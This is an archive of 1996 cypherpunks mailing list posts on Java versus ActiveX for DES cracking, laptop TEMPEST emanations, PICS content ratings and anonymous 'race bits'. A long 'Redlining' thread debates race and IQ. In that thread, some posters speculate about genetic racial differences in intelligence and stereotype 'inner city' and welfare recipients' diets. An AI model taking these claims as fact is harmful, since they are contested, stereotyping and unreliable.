> performance of hand-optimizer assembler that you can stick into ActiveX.

While ActiveX does support hand optmized assembler, there are Java 
JustInTime compilers which take JVM bytecodes and turn'em into raw 
assembler.  They aren't hand optimized, they are natively compiled code, 
but they are native code non the less.  A good optimizing compiler may 
not be 100% as cool and as fast as hand optmized code, BUT it'll be 
almost as fast.  And Java will run on just about EVERY platform out there.
And that is a bigger, more important point than a 10%-25% increase in 
power over non-optimized code.

Besides, I'm not arguing AGAINST an ActiveX client, there's no reason 
why there can't be both Java and ActiveX clients out there since there is 
both a compatibilty issue and a speed increase with ActiveX.


=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 12 Dec 1996 22:29:09 -0800 (PST)
To: Igor Chudov <ichudov@algebra.com>
Subject: Re: Redlining
In-Reply-To: <199612130431.WAA13881@manifold.algebra.com>
Message-ID: <32B0F731.2541@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Igor Chudov @ home wrote:
> Dale Thorn wrote:
> > E. Allen Smith wrote:

> > Actually, there is not only good evidence for the environmental argument,
> > Example:  Environment has a profound effect on a person's mind (outlook,
> > perceptions, attitudes, moods, etc.), and thereby has a significant, if
> > indirect effect on that person's hormone production (quantity, balance).
> > And believe it or not, in some (perhaps unusual) cases, unexpected
> > changes in hormone production can happen later in life as well, not
> > just during the "development" years. And I'm not talking about decreased

> I am sorry if I sound rather harsh, but this is a typical example how
> real statistical research is replaced by politicized bullshit.

There is *no* more real research that the research I do myself, and know
about myself:  1) I have generally tested in the top 1/000 of one percent
of the population in "intelligence", and  2) I have expended considerable
effort in personal study and experiments with what the human body is
capable of under given circumstances.  I have rubbed elbows with the
world's most well-conditioned people (physically), for one, and have
learned (for two) how to never get sick again (21 years running).

> How to test a null hypothesis that differences in IQ between whites
> and blacks are at least partially a result of genetic differences and
> are not explained by "environment" solely?

I hope I didn't give the wrong impression - genetics are certainly a
factor in anything human, however, environment has an overwhelming
influence on subsequent development. It's not 100% to 0%, in other words.

> All this "environment" stuff is rather easy to test and control for: take
> two groups of children -- one from one race, another from another race,
> who live in essentially the same conditions. Then compare the average IQs
> and check statistical validity of your samples.
> There was one study. They took a number of white adopted children and a
> number of black adopted children, and made sure that they controlled for
> other conditions such as adopted parents' income, etc.
> Guess what was the result of IQ tests of children?

I hope I don't regret saying this, but the above study has a far greater
chance of being "politicized bullshit" than anything I'm likely to say,
even when it's not from my personal experience.  Get serious, Igor.
How the devil are you going to evaluate the fairness, honesty, and other
attributes of such a study?  Do you know the researchers?

If you were evaluating the integrity of a University study on the sexual
preferences of a Tsetse fly, there is a reasonable possibility of taint
in such an innocuous study, due to the grant money and how the outcome
data can leverage other monies, etc., but a study of Black -vs- White
IQ's?  I wouldn't read such a study unless I were stranded on a desert
island with nothing else to do.  I'd be better off reading something
more relevant to real life, such as the power struggles between the
ADL and Willis Carto, or Fred Goldman and O.J. Simpson, whatever.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Thu, 12 Dec 1996 20:36:56 -0800 (PST)
To: dthorn@gte.net (Dale Thorn)
Subject: Re: Redlining
In-Reply-To: <32B03E27.5EF9@gte.net>
Message-ID: <199612130431.WAA13881@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Dale Thorn wrote:
> 
> E. Allen Smith wrote:
> > From:   IN%"ichudov@algebra.com" 11-DEC-1996 23:46:57.12
> > >I would appreciate if some attorney on this list shed some light on the
> > >legal definition of discrimination.
> 
> [snip]
> 
> > P.S. Please note that we cannot yet tell if the racial differences in
> > IQ are environmental or a mixture of environmental and genetic; I
> > believe they are purely environmental, but there is about as much
> > evidence for this belief as there is for God's existence (something
> > I also believe in).
> 
> Actually, there is not only good evidence for the environmental argument,
> but you can reason it out yourself if you give attention to some things
> that don't make it into most discussions on this topic.
> 
> Example:  Environment has a profound effect on a person's mind (outlook,
> perceptions, attitudes, moods, etc.), and thereby has a significant, if
> indirect effect on that person's hormone production (quantity, balance).
> Those hormone productions have more effect on the body and brain long-
> term than any other influence I can think of.
> 
> And believe it or not, in some (perhaps unusual) cases, unexpected
> changes in hormone production can happen later in life as well, not
> just during the "development" years. And I'm not talking about decreased
> production either.
> 
> 

Dale,

I am sorry if I sound rather harsh, but this is a typical example how
real statistical research is replaced by politicized bullshit.

How to test a null hypothesis that differences in IQ between whites
and blacks are at least partially a result of genetic differences and
are not explained by "environment" solely?

All this "environment" stuff is rather easy to test and control for: take
two groups of children -- one from one race, another from another race,
who live in essentially the same conditions. Then compare the average IQs 
and check statistical validity of your samples.

There was one study. They took a number of white adopted children and a 
number of black adopted children, and made sure that they controlled for
other conditions such as adopted parents' income, etc.

Guess what was the result of IQ tests of children?

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 12 Dec 1996 20:00:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Java DES breaker?
In-Reply-To: <Pine.SUN.3.91.961212221038.27578A-100000@beast.brainlink.com>
Message-ID: <9yVuyD159w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian <sunder@brainlink.com> writes:

> On Wed, 11 Dec 1996, Dr.Dimitri Vulis KOTM wrote:
>
> > I happen to have a Sparc 20 box and a Linux box and a SCO box, and ActiveX
> > won't work on any of those. I also work with a bunch of other equipment
> > that's much faster than a PC, but doesn't run browsers. (Most of it is not
> > connected to the 'net for security reasons, but that's besides the point.)
>
> Right, and Active X, if those machies were on the web, would not be
> supported.

That's what I said in line 1.  Your point?
(And of course if these machines were on the Web as servers, they could take
advantage of ActiveX on clients.)

> > Interpreted FORTH bytestream (which is what Java is) may be "doing quite we
> > when drawing GUI gizmos and widgets, but it can't get anywhere near the
> > performance of hand-optimizer assembler that you can stick into ActiveX.
>
> While ActiveX does support hand optmized assembler, there are Java
> JustInTime compilers which take JVM bytecodes and turn'em into raw
> assembler.  They aren't hand optimized, they are natively compiled code,
> but they are native code non the less.  A good optimizing compiler may

I've seen many Forth implementations, including pseudo-compilers similar
to what you describe. They sure generated a lot of instructions and an
occasional speed improvement over a simple-minded interpreter.

Can it go out on the web and talk to arbitrary servers?
Can it work with local files?

> not be 100% as cool and as fast as hand optmized code, BUT it'll be
> almost as fast.  And Java will run on just about EVERY platform out there.
> And that is a bigger, more important point than a 10%-25% increase in
> power over non-optimized code.

Where did the 10-25% figure come from?

Of course, Ray works for Earthweb, who has a "special partnership" with
SunSoft, and gets paid to badmouth competing products and push Java when
it's clearly inappropriate.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 12 Dec 1996 22:54:17 -0800 (PST)
To: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Redlining
In-Reply-To: <01ICXYGET6CSAEL8AI@mbcl.rutgers.edu>
Message-ID: <32B0FD15.1F84@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


E. Allen Smith wrote:
> From:   IN%"dthorn@gte.net"  "Dale Thorn" 13-DEC-1996 00:55:54.44
> >It is possible to understand intelligence as "pattern matching" skills,
> >without having to have attendant math and statistics to define it more
> >precisely or clinically. This understanding (if you have it) is the key
> >to knowing that Black persons do *not* have less IQ than White persons,
> >regardless of the standardized tests.  Something I know about, as I've
> >scored in the top 1/1000 of one percent, etc.

> Umm... so have I, and I've also done some extensive reading on
> the subject. The IQ tests in question do a good job (better than any
> other tests - to study & compare you've got to have some sort of test,
> and an IQ test doesn't see what color you are) at correlating with
> things such as job performance, educational success (e.g., GPA),
> likelihood even within given racial groups of being in poverty, etcetera.

I have not associated closely with any Black persons since 1981-1983, but
at that time, when I had worked with several such persons in Los Angeles,
in close quarters (me being the only White person), I was profoundly
impressed with the diversity and complexity of the issue (I was curious
about the issue due to my circumstances, although I certainly did not
mention it) in dealing with real people.  My experience tells me that
persons who administer intelligence tests and other related tests, or
persons who subscribe to study of such things, should get up close to
(for example) Black persons for an extended period of time, and I think
they (the White persons) would then seriously question any test results
which showed a consistent superiority for Whites.
 
> >Nice that you have good intuition on this point, however, the big question
> >in your paragraph is not wherefore the genetic determinant, rather, it is
> >the understanding of intelligence in its overall context, which I dare say
> >most researchers in that field are probably ill-equipped to grasp.

> Actually, my conclusions re: genetic differences are an educated
> guess... just one that isn't currently testable. My guess comes from such
> factors as that some groups that, to all appearances, have high IQs are
> actually pretty closely related to some groups that have low IQs; take
> hispanics (mixed caucasian and (via American Indian) asian ancestry).
> The debates over what is intelligence, etcetera are quite
> thoroughly ongoing in the field in question; multiple books have been
> written on the subject.

I have recently (Oct. 1996) more-or-less inherited three half-Navajo
children, upon the death of their father (mother died 1993).  The kids
are 9, 11, and 13.  I have described to various people (schoolteachers,
parents, computer programmers, and so on) that raising kids of this age,
at this point in my life, is no more difficult than just living my own
life without them.  Getting past the emotional weaknesses that can
hobble you as a parent or guardian is paramount, and once you do that,
the rest is a cakewalk.  But what I really wanted to say was that my
experience with these children now (whom I didn't know until mid-1996)
has convinced me more than ever that intelligence is not only not
primarily genetic, but may also be recoverable to a large extent up to
the beginning of the teen years, if not beyond that.  I would guess that
children from most any background, young enough and lacking actual
physical brain damage or extremely severe psychological trauma, can
probably be brought up to the point where they can perform on an equal
level with the best our society has to offer.

The main and overwhelming factor in developing children who can accomplish
at a superior level is the personal attention of a caregiver, and what
that attention consists of.  There are some things you can read about
in a book and guess what they mean, and there are some things you can
know when you're staring them in the face...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@pgp.com>
Date: Thu, 12 Dec 1996 23:09:09 -0800 (PST)
To: Joel McNamara <joelm@eskimo.com>
Subject: Re: Laptops and TEMPEST
In-Reply-To: <199612071705.JAA08570@comsec.com>
Message-ID: <v03100b05aed6af461675@[204.179.134.78]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:18 pm -0800 12/5/96, Joel McNamara wrote:
>Thinking that LCD screens reduce the risks of emanation monitoring is a
>dangerous misconception  [elided]  the gotcha with current laptops is their
>backlighting.  Electric and magnetic fields are considerably higher
>compared with a low-res/contrast device.  [elided]

An interesting point, but the fluorescent is mostly a constant signal,
really, but Hugh pointed out that most laptops have a video chip radiating
far more useful data than the flourescent backlight.

Just a thought.

   dave


____________________________________________________________________________
"I mixed this myself. (holds up glass of water) Two parts "H," one part "O."
 I don't trust _anybody_!"                                  --Steven Wright






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 12 Dec 1996 23:15:28 -0800 (PST)
To: Igor Chudov <ichudov@algebra.com>
Subject: Re: Redlining
In-Reply-To: <199612130634.AAA14833@manifold.algebra.com>
Message-ID: <32B1020E.7DE7@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Igor Chudov @ home wrote:
> Dale Thorn wrote:
> > Igor Chudov @ home wrote:
> > > Dale Thorn wrote:
> > > > E. Allen Smith wrote:

> Dale, the "bullshit" I referred to was not yours, it was something that
> you mentioned, so do not take it personally. I read your messages with
> interest.

Confucius say "To him that taketh offense, let him also take the gate".
(Sorry for the stupid pun, and I always assume the non-personal, but,
the subject begged for clarification.  I feel very limited in my
communication, given what I am thinking and trying to express it
clearly in English syntax.)

[snip]

> Absolutely agree. Another problem in measuring "environment" is
> that it is rather hard to quantify.

I would love to head up such a study, but with a difference: Instead of
doing purely passive research, which may have only an academic audience
(never minding the occasional Bell Curve etc. book), I would like to
impress my own training methods on the subjects, to see what their
physical and mental capacities really are (as far as my abilities
go, anyway), rather than simply watch.  It would be nearly impossible
(actually, probably impossible) in the USA to raise Black children and
totally isolate them from the mental awareness that a large segment of
the population has judgements about them having to do with their race.

Very sensitive people such as myself (and perhaps the Black children
under study as well?) know all too well the instant(!) impact that
such a realization and subsequent awareness has on a person's conscious-
ness (self-image, confidence et al), and how debilitating that awareness
can be in real life.  I don't think the studies reflect that. Then again,
to play Devil's Advocate for the studies, perhaps the studies just can't
be that broad in their scope, but, such a sensitive issue demands it.

[snip]

> It is a good question. To me, the study can be done by the worst assholes
> on the Earth. As long as their data can be verified and their methodology
> is known, I have no problem with personal biases of researchers.

There are so many factors, including (but not limited to) the unknown
agenda(s) of the senior persons in the money chain at the colleges,
think tanks, foundations, you get the picture.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Thu, 12 Dec 1996 23:23:58 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: !! Point 'n Crypt -- Win95 Privacy for Everyone !!
In-Reply-To: <01BBE820.DA06D920@dialup36.blarg.net>
Message-ID: <32B104E0.70AD@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


It seems you posted this everywhere but where it belongs: 
comp.os.ms-windows.announce. I think it's likely that the moderator
would approve the posting, even if he is annoyed.

Messages with more than one exclamation point on a line are technically 
off-topic, though.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 12 Dec 1996 20:52:45 -0800 (PST)
To: reagle@rpcp.mit.edu
Subject: Re: Why PICS is the wrong approach
Message-ID: <01ICXVY7TKJKAEL8AI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"reagle@rpcp.mit.edu"  "Joseph M. Reagle Jr." 12-DEC-1996 23:12:04.05

>  > More importantly, the "payload" does not carry some particular set of
>  > fairly-arbitrary PICS evluations. Binding by the censors instead of by the
>  > originator, which is as it should be.

>In which case, I disagree. I think accurate, consistent, "objective" (I
>know this is an argument on the other thread, I think one can get
>relatively "objective ratings" see my RSAC case study for a break down on
>the qualities of rating systems on my ecommerce page (home page below))
>well branded and reputable agents will have a greater weight, and will have
>a market motivation for accuracy exceeding regulatory pressure. (Plus,
>there is nothing preventing thresh-hold tolerances for use with multiple
>ratings.)

	Umm... I pointed out a while back the considerable problems with
the RSAC attempt at objective ratings. See
http://infinity.nus.sg/cypherpunks/dir.archive-96.05.09-96.05.15/0092.html
for a review of my objections. The system in question is obviously
much more subjective than, say, one that had:
	Does this page contain any female frontal nudity?
	Does this page contain any male frontal nudity?
	Does this page contain any female rear nudity?
	Does this page contain any male rear nudity?
and so on. The parts on violence are particularly subjective.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Thu, 12 Dec 1996 21:19:46 -0800 (PST)
To: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Why PICS is the wrong approach
Message-ID: <3.0.32.19961213001747.00937d30@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 11:51 PM 12/12/96 EDT, E. Allen Smith wrote:
  >	Umm... I pointed out a while back the considerable problems with
  >the RSAC attempt at objective ratings. See

	I agree that it is not a purely descriptive system, however it is much
moreso than others. I thought the following was a useful breakdown for my
own purposes:

Caveat on Vocabulary
Before proceeding with the analysis we must first discuss some of the terms
used in the analysis. The usage of terms "objective" and "judgmental" can
be rather contentious. To address this, we disassociate any of these terms
with any pejorative meanings ( opinionated gut feelings about Web content
can be very useful ) and posit  that there are three variables with which
content labeling systems can be considered: 

descriptive/judgmental - does the label describe the content, or provide an
opinion about the "appropriateness" of the content.

deterministic/non-deterministic - is the previous process a deterministic
process, or is it "gut" based, and 

voluntary, mandatory, or third party - does the author label his works
voluntarily, is he required to label his works by some other agency, or can
other services label his content.

No rating system we discuss is purely descriptive or deterministic. Rather,
each system varies with respect to where it falls between extremes.

_______________________
Regards,          Restlessness and discontent are the first necessities 
                  of progress. -Thomas A. Edison
Joseph Reagle     http://rpcp.mit.edu/~reagle/home.html
reagle@mit.edu    E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Fri, 13 Dec 1996 00:21:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: Java Crypto Code, was Re: Java DES breaker?
In-Reply-To: <Pine.SUN.3.91.961211130512.9870A-100000@beast.brainlink.com>
Message-ID: <v03007805aed6b908d474@[205.187.203.136]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:29 AM -0800 12/11/96, Dr.Dimitri Vulis KOTM wrote:
>If Bill's client is sure to run the platforms that MS IE runs on, then this is
>not a consideration.

My client is interested in Java for its cross-platform strengths.  I think
that modern machines are fast enough to encrypt the amount of data involved
even running interpreted Java (assuming something like 3DES).  JITs will
only help.  I see no need for assembly level coding for my client's
application.

(I certainly do see a need for assembly code in the DES crack attempt.)


-------------------------------------------------------------------------
Bill Frantz       | I still read when I should | Periwinkle -- Consulting
(408)356-8506     | be doing something else.   | 16345 Englewood Ave.
frantz@netcom.com | It's a vice. - R. Heinlein | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: C Matthew Curtin <cmcurtin@research.megasoft.com>
Date: Thu, 12 Dec 1996 21:37:37 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Credentials without Identity--Race Bits
In-Reply-To: <v03007804aed4c9238269@[207.167.93.63]>
Message-ID: <199612130530.AAA01548@goffette.research.megasoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Tim" == Timothy C May <tcmay@got.net> writes:

Tim> While it has been claimed by some that "crypto anarchy" means
Tim> that race won't matter, that cyberspace interactions will be
Tim> color-blind, this is misleading.

Race bits, gender bits, etc., are all interesting possibilities. I
never thought about anyone wanting to do such a thing, but I suppose
that's likely.

I've tended to think that as we become increasingly digital, issues
like race become less significant (perhaps because it generally isn't
immediately obvious in this medium). This doesn't mean that prejudices
go away, it means that they shift to stay with what is obvious. For
example, people who are unable to spell well (and don't spellcheck
email and usenet posts), or use excessively poor grammar are often
ridiculed for their lack of mastery of the language in which they're
writing. Basically, the prejudices and such continue with us, but
change, so as to remain based on things that are easily discernible.

Tim> While many--probably most--users will care only for cyberspace
Tim> personna issues, and not meatspace personna issues of race,
Tim> color, height, weight, etc., this is not something built in to
Tim> anonymous transactions.

As I'm replying, it's occurred to me that we've already got some sort
of persona "certificates" floating around now. (Such as the Geek
Code.) Imagine a field there to include race. Wouldn't take a lot to
do that, after all.

Of course, the implementation of a race bit system that can be trusted
is another issue altogether. Would the White Boyz Club then need to
have its own trusted arbitrator to introduce people of the same race
to each other? (AryanSign?) Is a more elaborate PGP-style web
of trust used? Hmm.

-- 
Matt Curtin  cmcurtin@research.megasoft.com  Megasoft, Inc   Chief Scientist
http://www.research.megasoft.com/people/cmcurtin/   I speak only for myself.
Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 12 Dec 1996 21:33:11 -0800 (PST)
To: reagle@rpcp.mit.edu
Subject: Re: Why PICS is the wrong approach
Message-ID: <01ICXXDDFSK6AEL8AI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"reagle@rpcp.mit.edu"  "Joseph M. Reagle Jr." 13-DEC-1996 00:19:47.19
To:	IN%"EALLENSMITH@mbcl.rutgers.edu"  "E. Allen Smith"
CC:	IN%"cypherpunks@toad.com"
Subj:	RE: Why PICS is the wrong approach

Received: from RPCP.MIT.EDU by mbcl.rutgers.edu (PMDF #12194) id
 <01ICXWWYIT0GAH4L7K@mbcl.rutgers.edu>; Fri, 13 Dec 1996 00:19 EDT
Received: from dialup-273.lcs.mit.edu by rpcp.mit.edu with SMTP id AA05830;
 Fri, 13 Dec 1996 00:20:21 -0500
Date: Fri, 13 Dec 1996 00:17:54 -0500
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Subject: RE: Why PICS is the wrong approach
To: "E. Allen Smith" <EALLENSMITH@mbcl.rutgers.edu>
Cc: cypherpunks@toad.com
Message-id: <3.0.32.19961213001747.00937d30@rpcp.mit.edu>
X-Envelope-to: EALLENSMITH
Content-type: text/plain; charset="us-ascii"
X-Sender: reagle@rpcp.mit.edu
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Mime-Version: 1.0

At 11:51 PM 12/12/96 EDT, E. Allen Smith wrote:
  >	Umm... I pointed out a while back the considerable problems with
  >the RSAC attempt at objective ratings. See

>	I agree that it is not a purely descriptive system, however it is much
>moreso than others. I thought the following was a useful breakdown for my
>own purposes:

	The below (from your essay) is a reasonable way to look at it. I
would tend to compare a system to obviously possible systems as well as to
simply what else is out there, however.

>descriptive/judgmental - does the label describe the content, or provide an
>opinion about the "appropriateness" of the content.

	In this regard, I would call the system in question about midway
between a truly descriptive system and such obviously judgemental systems
as SafeSurf. This partially judgemental nature is probably unavoidable in
systems in which one uses a non-binary rating scheme; if the presence of
something inevietably means that the system gives a "high" rating, then
the system is judging that the something is more important than other
factors. In this case, the judgement is pretty obviously that they deem the
something in question (such as "hate speech" that calls for "harm" to some
class - although I doubt they'd include pro-Affirmative-Action speech in
that...) to be worse than the "lower" rated actions.

>deterministic/non-deterministic - is the previous process a deterministic
>process, or is it "gut" based, and 

	I would agree that RSAC's system is pretty deterministic; the
choices of what is labelled are rather arbitrary, but that falls under
the description vs judgement category above.

>voluntary, mandatory, or third party - does the author label his works
>voluntarily, is he required to label his works by some other agency, or can
>other services label his content.

	As currently set up, RSAC is either voluntary or mandatory - a
government could require that it be used as a mandatory system, directly
or indirectly (e.g., under threat of lawsuits for "corrupting minors").

>No rating system we discuss is purely descriptive or deterministic. Rather,
>each system varies with respect to where it falls between extremes.

	Agreed.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Thu, 12 Dec 1996 22:37:46 -0800 (PST)
To: dthorn@gte.net (Dale Thorn)
Subject: Re: Redlining
In-Reply-To: <32B0F731.2541@gte.net>
Message-ID: <199612130634.AAA14833@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Dale Thorn wrote:
> 
> Igor Chudov @ home wrote:
> > Dale Thorn wrote:
> > > E. Allen Smith wrote:
> 
> > > Actually, there is not only good evidence for the environmental argument,
> > > Example:  Environment has a profound effect on a person's mind (outlook,
> > > perceptions, attitudes, moods, etc.), and thereby has a significant, if
> > > indirect effect on that person's hormone production (quantity, balance).
> > > And believe it or not, in some (perhaps unusual) cases, unexpected
> > > changes in hormone production can happen later in life as well, not
> > > just during the "development" years. And I'm not talking about decreased
> 
> > I am sorry if I sound rather harsh, but this is a typical example how
> > real statistical research is replaced by politicized bullshit.
> 
> There is *no* more real research that the research I do myself, and know
> about myself:  1) I have generally tested in the top 1/000 of one percent
> of the population in "intelligence", and  2) I have expended considerable
> effort in personal study and experiments with what the human body is
> capable of under given circumstances.  I have rubbed elbows with the
> world's most well-conditioned people (physically), for one, and have
> learned (for two) how to never get sick again (21 years running).

Dale, the "bullshit" I referred to was not yours, it was something that
you mentioned, so do not take it personally. I read your messages with
interest.

> > How to test a null hypothesis that differences in IQ between whites
> > and blacks are at least partially a result of genetic differences and
> > are not explained by "environment" solely?
> 
> I hope I didn't give the wrong impression - genetics are certainly a
> factor in anything human, however, environment has an overwhelming
> influence on subsequent development. It's not 100% to 0%, in other words.

Absolutely agree. Another problem in measuring "environment" is
that it is rather hard to quantify.

> > All this "environment" stuff is rather easy to test and control for: take
> > two groups of children -- one from one race, another from another race,
> > who live in essentially the same conditions. Then compare the average IQs
> > and check statistical validity of your samples.
> > There was one study. They took a number of white adopted children and a
> > number of black adopted children, and made sure that they controlled for
> > other conditions such as adopted parents' income, etc.
> > Guess what was the result of IQ tests of children?
> 
> I hope I don't regret saying this, but the above study has a far greater
> chance of being "politicized bullshit" than anything I'm likely to say,
> even when it's not from my personal experience.  Get serious, Igor.
> How the devil are you going to evaluate the fairness, honesty, and other
> attributes of such a study?  Do you know the researchers?

It is a good question. To me, the study can be done by the worst assholes
on the Earth. As long as their data can be verified and their methodology
is known, I have no problem with personal biases of researchers.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 13 Dec 1996 00:46:02 -0800 (PST)
To: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Redlining
In-Reply-To: <01ICY0SRNW7QAEL8AI@mbcl.rutgers.edu>
Message-ID: <32B11667.2740@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


E. Allen Smith wrote:
> From:   IN%"dthorn@gte.net"  "Dale Thorn" 13-DEC-1996 01:53:17.65[snip]
> >the rest is a cakewalk.  But what I really wanted to say was that my
> >experience with these children now (whom I didn't know until mid-1996)
> >has convinced me more than ever that intelligence is not only not
> >primarily genetic, but may also be recoverable to a large extent up to
> >the beginning of the teen years, if not beyond that.

> Actually, IQ tests in childhood up until about age 12 aren't
> particularly well correlated with adult IQ; they would thus agree with
> you on that environment can heavily influence IQ until that point.

Again, as a statistical exercise, this might be OK, but, quite a bit of
what you would see in the exceptional areas of the curve in childhood
would be rather obvious in adulthood as well. The fact that this doesn't
seem so obvious across the statistical curve is only evidence of poor
granularity in the data.

> It is possible to raise IQs somewhat with various environmental
> interventions; the question is how much. Research such as that
> discussed in Herman Spitz's "Raising Intelligence" (_not_ a conservative
> or racist by any means) appears to show that such does, unfortunately,
> have some points at which one gets to diminishing returns; see below
> for more discussion.

A typical researcher or team of same would not be proper candidates to
lead an interventionist study such as this.  You'd need people with
proven track records.  As I keep telling my wife again and again, when
we go into a book store and she picks up some book on a "health" topic:
What's the author's track record, not only for him/herself, but in
leading others?

> Regarding the "physical brain damage," I have earlier mentioned
> prenatal traumas such as lead; other instances would be inadequate
> maternal nutrition and the intake of alcohol (signifigantly more harmful
> to a child than crack). These are among the factors, other than racism,
> making studies showing differences in IQ between black adoptees and
> white adoptees difficult to interpret; cultural influences (racism,
> white adoptive parents trying to hard to raise black children in their
> "own" culture, etcetera) are another major group of factors.
> In other words, we don't know yet.

> >The main and overwhelming factor in developing children who can accomplish
> >at a superior level is the personal attention of a caregiver, and what
> >that attention consists of.  There are some things you can read about
> >in a book and guess what they mean, and there are some things you can
> >know when you're staring them in the face...
> 
> Certainly, extremely intensive care can help children who do not
> have physical brain problems. This does not mean that genetics does not
> play a considerable role; neither I nor (so far as I know) Mr. Chudov
> are claiming that genetics sets an unoverridable barrier. It is more a
> matter of that it will take a lot more to get a genetically unintelligent
> child to a given level than it will a genetically intelligent child.

It's just that in my personal experience, I've found that the vast
majority of children fall into the category of "exceptional potential".
I guess what I'm saying is that the accomplishment/test norms for most
children are far enough below where I could get them to with personal
attention, that  1) The norms are useful (to me) only as a stasticical
exercise, and  2) The differences between typical children and typical
children performing at or near their potential obscures the differences
found amongst the norms.

> In the larger, societal context, it is not possible to have
> intelligent parents with ample resources taking care of every child
> unless the number of children is considerably reduced. Quite simply,
> resources are limited (otherwise we would have no need for an
> economic system); money, time, etcetera spent on less intelligent
> children is not being spent on other pursuits (such as raising
> more intelligent children, who will be able to accomplish more in
> later life with the same investment of resources).

This is, I believe, what I and others feared from studies which provide
material for books such as the Bell Curve.  Knowing that the potential
of an allegedly unintelligent (or less-than-average) child might be so
great that that child (if lucky enough to get the opportunity) could
actually develop to be a significantly better performer than another
child with 40 more IQ points, even if the child with the higher IQ has
a reasonably good environment to develop in. Those kinds of possibilities
are (I think) near and dear to what some of our more enlightened founding
fathers in the USA had in mind when they wrote what they did, way back when.

I value the writings of all philosophers, BTW, but I reject the notions
of any that I or any other autonomous individual (a human is more-or-less
autonomous by definition, yes?) could be defined, limited, or otherwise
constrained by studies such as we've discussed.  I say constrained since
these studies do not happen in a vaccuum, and there is always going to be
some kind of fallout.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 13 Dec 1996 00:51:51 -0800 (PST)
To: snow <snow@smoke.suba.com>
Subject: Re: Redlining
In-Reply-To: <199612130156.TAA02703@smoke.suba.com>
Message-ID: <32B118A7.4463@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


snow wrote:
> Mr. Thorn wrote:[snip]
> > Example:  Environment has a profound effect on a person's mind (outlook,
> > perceptions, attitudes, moods, etc.), and thereby has a significant, if
> > indirect effect on that person's hormone production (quantity, balance).
> > Those hormone productions have more effect on the body and brain long-
> > term than any other influence I can think of.

>      I bet the problem is even simpler than that.
>      Look at studies that correlate nutrition with grades/learning.
>      Look at "inner city" dietary habits of 3 to 5 year old children (and
>      any other "under performing" group).
>      I'd bet $20 on the correlation.

Not a bad point.  Theoretically, you can't buy smokes and liquor with
food stamps etc., but really, if you stand in a checkout line and see
what people *can* get with their handouts, it's, uh, impressive.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
